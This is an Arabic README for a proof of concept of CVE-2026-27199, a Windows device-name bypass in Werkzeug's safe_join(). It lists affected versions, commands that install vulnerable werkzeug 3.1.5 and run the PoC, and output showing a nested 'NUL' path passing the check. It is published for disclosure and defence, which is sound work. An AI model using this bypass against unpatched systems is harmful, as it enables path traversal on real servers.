
إثبات مفهوم لاستغلال CVE-2026-27199، وهو تجاوز لاسم جهاز Windows في دالة safe_join() الخاصة بـ Werkzeug، يوضح اجتياز المسار والتجاهل الصامت للبيانات.
safe_join() الخاصة بـ Werkzeugالحالة: تم الكشف علنًا. تم إصلاحه في werkzeug 3.1.6.
الخطورة: متوسطة
المُبلّغ: @alimezar
النشرة الأمنية: GHSA-29vq-49wr-vm6x
| الحزمة | المتأثرة | المُصحّحة |
|---|
| werkzeug | < 3.1.6 | 3.1.6 |
يتطلب: Windows، Python 3.8+،
werkzeug < 3.1.6
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug version : 3.1.5
[*] os.name : nt
[+] safe_join(base, 'NUL') -> None (correctly blocked)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL (bypass!)
[*] Attempting to write to the returned path ...
[!] open(nested NUL) write: SUCCESS — data silently discarded by device
[!] VULNERABLE: CVE-2026-27199 confirmed on this installation.
Upgrade to werkzeug >= 3.1.6 to remediate.
[+] safe_join(base, 'subdir/NUL') -> None (correctly blocked)
[+] NOT VULNERABLE: nested device name was blocked.
تم نشر إثبات المفهوم هذا لأغراض تعليمية ودفاعية بعد الإفصاح المسؤول وتوفّر التصحيح علنًا.